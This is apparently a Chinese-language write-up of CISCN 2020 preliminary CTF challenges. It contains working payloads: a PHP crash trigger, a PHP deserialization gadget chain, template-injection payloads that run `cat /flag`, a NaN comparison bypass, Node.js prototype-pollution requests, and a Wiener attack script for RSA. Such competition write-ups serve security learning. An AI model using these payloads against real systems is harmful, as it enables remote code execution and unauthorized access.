
2020ciscn初赛


初赛还算简单,都是可以搜索到的,就是比较花费功夫,不得不说web🐶是真的没有人权,加起来不到200分,做最多的题,拿最低的分。

2020ciscn初赛

web

easyphp

把它异常退出就给flag

https://bugs.php.net/bug.php?id=79982

call_user_func_array("stream_socket_client",["aa",false,true]);

触发崩溃

http://eci-2zeahv20ya7x7jyq6zh8.cloudeci1.ichunqiu.com/?a=stream_socket_client&b=aa

搜flag就ok

babyunserialize

Wmctf2020 webweb,原题,加ban了一点函数,不过没有什么大的区别

flag在phpinfo

<?php
namespace DB{
// Stand-in for the DB\Cursor base class of the application under test (the page
// says this is the WMCTF 2020 "webweb" chain); it only has to exist with the same
// name and interface so that a Mapper can be instantiated and serialized below.
// An abstract class may implement \IteratorAggregate without defining getIterator().
abstract class Cursor implements \IteratorAggregate {}
}


namespace DB\SQL{
// Stand-in for DB\SQL\Mapper. Only the class/property names, their visibility
// and their declaration order matter here: that is what ends up in the
// serialize() output produced at the end of the script.
class Mapper extends \DB\Cursor{
protected
// quotekey is set to "phpinfo" (the page notes the flag is in phpinfo output).
$props=["quotekey"=>"phpinfo"],
$adhoc=["-1"=>["expr"=>""]],
$db;
// Empty stubs: getIterator() is required by \IteratorAggregate; the
// offset*() methods are declared only so the class shape is complete.
function offsetExists($offset){}
function offsetGet($offset){}
function offsetSet($offset, $value){}
function offsetUnset($offset){}
function getIterator(){}
function __construct($val){
// $db holds whatever the caller passes in; CLI\Agent passes another Mapper.
$this->db = $val;
}
}
}
namespace CLI{
// Stand-in for CLI\Agent; its constructor builds the object graph that gets serialized.
class Agent {
protected
$server="";
public $events;
public function __construct(){
// array(object, "find") is PHP's array-callable shape; the inner Mapper("")
// becomes the outer Mapper's $db.
$this->events=["disconnect"=>array(new \DB\SQL\Mapper(new \DB\SQL\Mapper("")),"find")];
// Reference back to the object itself; serialize() writes it as a back-reference.
$this->server=&$this;


}
};
// Empty marker class; it is the first element of the serialized array.
class WS{}
}
namespace {
    // Emit the URL-encoded serialized object graph: a WS marker first, then the Agent.
    $graph = array(new \CLI\WS(), new \CLI\Agent());
    $serialized = serialize($graph);
    echo urlencode($serialized);
}

rceme

https://blog.csdn.net/CSDNPM250/article/details/104211233

{if:1);phpinfo();//}{end if}就命令执行了

使用反引号命令执行

{if:1);var_dump(`cat /flag`);//}{end if}

easytrick

使用 NAN(INF/INF 或 INF-INF 的结果)即可绕过

<?php
class trick{
    /** Two public properties, serialized in declaration order; both start as null. */
    public $trick1, $trick2;
}
$a = new trick();
// Both INF/INF and INF-INF evaluate to NAN, which is not equal even to itself.
$a->trick1 = INF / INF;
$a->trick2 = INF - INF;
print serialize($a);

littlegame

Nodejs 代码很简单,审计完就大致可以猜到是原型链污染(index.js)

img

污染admin就可以,往上找可以看到admin用了环境变量

img

看到我们的污染源头是setFn

img

如果污染了knight,顺着session,就来到这里(app.js)

img

和process扯上了,于是所有都扯上了(表达可能有点不清楚)

所以payload只需要

POST /Privilege
NewAttributeKey=__proto__.passwd&NewAttributeValue=123

然后再

POST /DeveloperControlPanel
key=passwd&password=123

nodejs特性,可能要把容器重新开一下再试。

Crypto

db

Wiener attack

import gmpy2
import time
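def continuedFra(x, y):
    """Return the continued-fraction expansion of x/y as a list of partial quotients.

    Args:
        x: numerator (non-negative integer).
        y: denominator (non-negative integer); an empty list is returned when y == 0.

    Returns:
        list of integer partial quotients, produced by the Euclidean algorithm.
    """
    quotients = []
    # Floor division keeps this exact for big integers on both Python 2 and 3;
    # the original used '/', which becomes float division under Python 3.
    while y:
        quotients.append(x // y)
        x, y = y, x % y
    return quotients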
def Simplify(ctnf):
    """Collapse a continued-fraction prefix into a single fraction.

    The pair is returned as (denominator, numerator) of the reconstructed
    fraction, e.g. Simplify([1, 2, 2, 2]) == (12, 17) for 17/12; callers
    rely on this order. An empty prefix yields (0, 1).
    """
    lower, upper = 0, 1
    for term in reversed(ctnf):
        lower, upper = upper, term * upper + lower
    return (lower, upper)

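def calculateFrac(x, y):
    """Return the convergents of x/y as (denominator, numerator) pairs.

    Every proper prefix of the continued fraction of x/y is collapsed with
    Simplify; the full expansion (which reproduces x/y itself) is skipped,
    as in the original.

    Returns:
        list of (d, k) tuples, so Python 2 and 3 behave the same (under
        Python 3 the original returned a lazy map object).
    """
    quotients = continuedFra(x, y)
    # range() replaces xrange() so this also runs under Python 3.
    return [Simplify(quotients[:i]) for i in range(1, len(quotients))]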
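def solve_pq(a, b, c):
    """Return the two integer roots of a*x^2 + b*x + c = 0.

    Uses gmpy2.isqrt for the discriminant, so the result is exact for big
    integers. When the discriminant is not a perfect square the roots are
    truncated, so the caller must verify them (p * q == n).

    Raises:
        ValueError: propagated from gmpy2.isqrt when the discriminant is negative.
    """
    root = gmpy2.isqrt(b * b - 4 * a * c)
    # Floor division: with '/' Python 3 would produce floats and lose
    # precision on 1024-bit operands.
    return (-b + root) // (2 * a), (-b - root) // (2 * a)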
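def wienerAttack(e, n):
    """Recover the RSA factors (p, q) of n when the private exponent is small.

    Walks the convergents k/d of e/n; for each candidate it derives
    phi = (e*d - 1)/k and solves x^2 - (n - phi + 1)*x + n = 0 for p and q.

    Returns:
        (p, q) as positive ints when a convergent factors n, otherwise None
        after printing 'not find!' (the original returned None implicitly).
    """
    for (d, k) in calculateFrac(e, n):
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        b = n - phi + 1
        # A negative discriminant cannot give integer roots; skipping it also
        # avoids the ValueError gmpy2.isqrt raises on negative input.
        if b * b - 4 * n < 0:
            continue
        p, q = solve_pq(1, b, n)
        if p * q == n:
            return abs(int(p)), abs(int(q))
    print('not find!')
    return None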
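# Python 2 script body: print statements, str.decode('hex') and time.clock()
# (removed in Python 3.8) are all Python 2 only.
time.clock()
n = 86966590627372918010571457840724456774194080910694231109811773050866217415975647358784246153710824794652840306389428729923771431340699346354646708396564203957270393882105042714920060055401541794748437242707186192941546185666953574082803056612193004258064074902605834799171191314001030749992715155125694272289
e = 46867417013414476511855705167486515292101865210840925173161828985833867821644239088991107524584028941183216735115986313719966458608881689802377181633111389920813814350964315420422257050287517851213109465823444767895817372377616723406116946259672358254060231210263961445286931270444042869857616609048537240249
c = 37625098109081701774571613785279343908814425141123915351527903477451570893536663171806089364574293449414561630485312247061686191366669404389142347972565020570877175992098033759403318443705791866939363061966538210758611679849037990315161035649389943256526167843576617469134413191950908582922902210791377220066
result = wienerAttack(e, n)
# wienerAttack returns None when no convergent works; unpacking None would
# raise a TypeError, so stop with a non-zero exit status instead.
if result is None:
    raise SystemExit(1)
p, q = result
print '[+]Found!'
print ' [-]p =',p
print ' [-]q =',q
print ' [-]n =',p*q
d = gmpy2.invert(e,(p-1)*(q-1))
print ' [-]d =', d
# Pad to an even number of hex digits: str.decode('hex') rejects odd-length input.
m_hex = '{:x}'.format(pow(c,d,n))
if len(m_hex) % 2:
    m_hex = '0' + m_hex
print ' [-]m is:' + m_hex.decode('hex')
print '\n[!]Timer:', round(time.clock(),2), 's'
print '[!]All Done!'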

第一道rsa待补充,怕是需要太湖之光
